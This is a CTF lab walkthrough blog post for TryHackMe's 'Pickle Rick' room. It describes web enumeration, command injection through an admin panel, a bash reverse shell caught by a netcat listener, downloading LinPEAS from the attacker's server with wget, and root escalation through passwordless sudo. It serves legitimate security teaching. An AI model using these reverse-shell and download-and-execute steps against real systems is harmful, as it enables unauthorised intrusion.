Pickle Rick

TryHackMeWeb Hacking Fundamentals
Written By FightTheWest
 
header.jpg
 

The link for this lab is located here: https://tryhackme.com/room/picklerick

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

Walkthrough for Beginners

First thing I do for every room is to perform an initial nmap scan that targets all ports (1-65535) to get a quick overview of what ports are open. To do this, I use the syntax "nmap -T4 -p- -oA initialscan [IP]” where:

  • -T4 specifies the speed settings (T1 being the slowest, T5 the fastest)

  • -p- specifies all ports

  • -oA initialscan outputs into all formats (normal, XML, grepable formats) with a name of initialscan

  • [IP] is the target machine

nmap initial scan.png

The scan reveals that port 22 and port 80 are open.

The next step is to perform a more intensive scan on these two ports only to get more idea about version numbers, OS detection possibly and more information. The syntax for this is “nmap -A -sV -T4 -p22,80 -oA servicescan [IP]” where:

  • -A performs OS detection, version detection, script scanning, and traceroute

  • -sV performs service version detection

  • -T4 specifies the speed

  • -p22,80 specifies only two ports (22 and 80)

  • -oA servicescan outputs all formats called servicescan

  • [IP] is the target machine

nmap service scan.png

This reveals that the HTTP web page has a title of “Rick is sup4r cool” and that the OS has been detect as Linux (possibly Ubuntu as specified in the SSH version). Not much information we can go off right now but this does tell us that a website is running.

The next step is to visit the site to perform some enumeration.

webpage.png

As we can, there is a very basic website here. Since there is nowhere we can navigate to right now, a good source of information is the source code. Looking at the source code for the main page reveals an interesting comment:

username.png

We now have a username that we could possibly use later - take note of it!

If there is a username this likely indicates that there is a login page somewhere possibly for admin or normal users. To discover these possible pages, we can use a directory busting tool such as Dirbuster or Gobuster (or any other you prefer). For me, I will be using Gobuster with the syntax:

gobuster dir -u http://10.10.79.158 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,zip,html,bak

  • dir -u http://10.10.79.158 specifies the website to directory bust

  • -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt specifies the wordlist to use

  • -x php,txt,zip,html,bak specifies the type of files to look for (in this case PHP, text files, backups, and HTML pages)

After a short while, the gobuster will start to return some interesting result:

gobuster.png

The “robots.txt” file usually contains directories that web developers do NOT want search engines finding and displaying on Google for example. Checking that file could reveal some interesting hidden directories:

robots.txt.png

As you can see there is an interesting piece of text in here but no hidden directories. Keep note of this in case we find a user for it later!

For now, we can go back to the Gobuster results as we have two interesting pages left to look at. As you can see, there is a login.php page which is very interesting considering we found a username in the source code. Navigating to it reveals a simple login page:

loginpage.png

We know we have username (R1ckRul3s) but we don’t know the password yet. Or do we? What if we try that random string we found in robots.txt (Wubbalubbadubdub) as the password? Upon entering these potential credentials and hitting Enter, we get successfully logged in and redirected to another page that looks like an admin panel with a “Command Panel”.

commandinject.png

Knowing that this is a Linux system (thanks to our Nmap scan) we could possibly try some very simple Linux commands to see if we have access to the system through this panel. Doing a simple “ls” command to list the files in the current directory reveals that we can run Linux commands.

lscomm.png

Next, we can try running some more basic commands such as “pwd” to see where we are and “whoami” to see if we are possibly the root user.

pwd.png
wwwdata.png

We can see that through this command portal we are running as the “www-data” and are currently in the /var/www/html directory (which is the default root folder of the web server).

Going back to the “ls” command we executed, we see an interesting text file called “Sup3rS3cretPickl3Ingred.txt“.

Looking at the other files in the output we see pages we have already visited such as login.php and index.html (the home page). This tells us that all these files are in the root of the web server. Knowing this, we can try and simply access the .txt file by appending it to the end of the web address.

firsting.png

There we go! Simply navigating to it revealed our first ingredient.

We also saw another filed called “clue.txt” which, as the name suggests, could give us some clues as to where the other ingredients are. If we open up the same way we just did by appending it, we get a hint.

clue.png

This tells us to look around the file system. Going back to the “Command Panel” we know it is acting like a normal terminal on Linux where we can use various commands. One of the most important directories to check for important files is the /home directory to reveal certain users and possibly files inside their sub-directory. If we run the “ls /home” command we see two directories belonging to users - rick and ubuntu.

lshome.png

The “ubuntu” directory seems like a default directory on the Linux system itself but the “rick” directory is most certainly a configured user. If we list the contents of the “/home/rick” directory via “ls /home/rick” it reveals an interesting file.

lsrick.png

We have found the second ingredient. To read the contents of this file, we can try using the cat command followed by the full directory path - cat /home/rick/second\ ingredients. (NOTE: the backslash after second is needed due to a space in the filename).

commanddis.png

We’ve ran into a roadblock. The “cat” command to read files is disabled.

At this point, we could try and go through every command that allows us to read files in Linux such as “more”, “less”, “tail”, “head” and much more. But, the more interesting way in my opnion is to try and get a reverse shell from this command panel.

If we navigate to the trusty Pentest Monkey reverse shell cheat sheet, we have a variety of possibilities to get a reverse shell connection depending on what is installed and running on the victim machine. Looking at the first one on the linked page, we see that it is a BASH reverse shell.

Knowing that this is a Linux system, we can try this first. Before we try any of these commands however, make sure that you have a Netcat listener set up to potentially catch a connection. For me, I have one running on port 5184 (use any port you want as long as it’s free) via the command nc -nvlp 5184

nc.png

Now we can try the bash reverse shell by first changing the IP and port listed in the command - change 10.0.0.1 to your TryHackMe IP and the 8080 to the port you selected in the Netcat command - and then pasting it into the Command Panel and hitting Execute.

Unfortunately, nothing will happen. However, this is not the Command Panel’s fault. Doing a little bit of research on the BASH command reveals that to run full commands you need the “bash -c” parameter before any command.

bashc.png

If we put that in front and put single quotation marks around the reverse shell from Pentest Monkey, it could work.

bashrev.png

When hitting Execute, the webpage will be stuck in a loading loop. However, if we go back to our Netcat listener in our terminal, we should (hopefully) have a shell.

shell.png

Bingo! We know have a shell on the target machine with no restricted commands (at least none that require root privileges) meaning we can run the cat command on that /home/rick/second ingredients file and get our second ingredient.

seconding.png

Now that we have access to this machine, the next step is to escalate our privileges. There are multiple ways to do this - both manually and automated. My preferred method is to use a tool called LinPEAS which will do a bunch of commands that could reveal some escalation vulnerabilities on the machine for us.

Simply download the file either using git clone or by simply copying and pasting the code in the link into a document on your machine and saving it as linpeas.sh. For me, I simply cloned the whole directory to my machine using git clone:

linpeas.png

Once downloaded, we need to get the LinPEAS script onto our target. Again, there are multiple ways to get this done. The simplest way is to host a web server on our local machine using Python3 and download the file using wget on the target machine.

First step is to host a web server in the directory where the LinPEAS script is located. Navigate to that directory and use the following command: sudo python3 -m http.server 80

python3 server.png

This simply starts a web server on our local machine which hosts all the files in the current directory. Next, we can go back to the victim machine and use the “wget” command followed by our TryHackMe IP and the file we want to download - in my case it would be "“wget http://10.11.3.112/linpeas.sh

wget.png

It is now successfully been downloaded onto our victim machine. Before we run it, we have to make sure it has execute permissions (or else it won’t run). To do this, we simply add execute permissions via the chmod command: chmod +x linpeas.sh

chomd.png

Perfect! Now all we need to do is run it and wait until it finished - it will be a massive output so just be patient. To run it, use the syntax “./linpeas.sh”.

linpeasran.png

Once it has finished running, we can scroll through carefully and take a look using the legend provided at the top to look for anything critical or interesting. Scrolling down a little bit, we notice a very interesting section relating to sudo permissions.

sudoperms.png

This means we can run ANY command as the root user without having to specify a password - very useful for attackers! We could simply list out the contents of the “/root” directory using sudo and possibly cat the file inside but a better way is to get a shell as root.

Knowing we can execute ANY command as root, we can simply execute the “bash” command to get a shell as root by specifying sudo in front of it.

rootshell.png

Using the first command only does work but we don’t get the nice looking shell we had before and it can be unstable in certain circumstances. To fix this, we simply stabilize it by using Python3 to create a nicer BASH shell with the current directory and user on the left like we are used to. - this article explains it very well and gives multiple ways to get an upgraded shell for future use.

Once we have this fully functioning shell, we can simply try navigating to the “/root” directory and listing out the contents via ls.

3rd.png

There is an interesting file called “3rd.txt” which could be our 3rd ingredient. Reading the contents, we can see that it is indeed our third ingredient and we have successfully completed this room!

thirding.png

I hope you learned something across this room and had a lot of fun. Congratulations on completing this room and good luck on continuing your ethical hacking journey! Thanks for viewing!

FightTheWest
Previous

Hashing - Crypto 101 Room
Next

Upload Vulnerabilities Room